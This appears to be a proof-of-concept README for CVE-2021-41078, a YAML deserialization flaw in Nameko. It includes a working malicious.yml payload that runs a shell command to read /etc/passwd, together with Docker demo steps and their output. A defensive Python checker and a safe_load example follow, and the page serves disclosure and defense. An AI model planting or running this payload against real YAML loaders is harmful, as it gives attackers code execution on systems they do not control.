nameko Arbitrary code execution due to YAML deserialization

s-index/CVE-2021-41078

CVE-2021-41078

nameko Arbitrary code execution due to YAML deserialization

NVD Description

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

Demo

Set Up

  1. Build an image from the Dockerfile:
     docker build -t cve-2021-41078 .
  2. Run python main.py in a new container:
     docker run -it --rm cve-2021-41078

Output (/etc/passwd)

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

PoC Payload

malicious.yml

!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
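
A defender-side check for the payload above, as an added example that is not part of this repository or of Nameko: it lists the python/* tags in a config file without constructing any objects, and shows that PyYAML's safe_load refuses the document. It assumes PyYAML is installed; python_tags, load_config and the benign sample config are hypothetical names and data made up for illustration.

```python
import yaml  # PyYAML

# The page's malicious.yml as text. It is only parsed here, never constructed.
MALICIOUS_YML = """\
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
"""

# Constructed benign config for comparison (keys are illustrative).
BENIGN_YML = "AMQP_URI: amqp://guest:guest@localhost\nmax_workers: 10\n"

YAML_NS = "tag:yaml.org,2002:"


def python_tags(text):
    """List python/* tags in a YAML stream by walking the composed node
    graph; nothing is instantiated, so the check is safe on hostile input."""
    found, seen = [], set()

    def walk(node):
        if node is None or id(node) in seen:  # aliases may revisit a node
            return
        seen.add(id(node))
        if node.tag.startswith(YAML_NS + "python/"):
            found.append(node.tag[len(YAML_NS):])
        if isinstance(node, yaml.SequenceNode):
            for child in node.value:
                walk(child)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                walk(key)
                walk(value)

    for document in yaml.compose_all(text, Loader=yaml.SafeLoader):
        walk(document)
    return found


def load_config(text):
    """Hardened load: SafeLoader has no constructor for python/* tags."""
    try:
        return yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        raise ValueError(f"rejected unsafe YAML: {exc.problem}") from exc


if __name__ == "__main__":
    print(python_tags(MALICIOUS_YML))
```

python_tags can run as a pre-deployment or CI check over config files, while load_config shows the loader choice that makes the same document fail closed.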
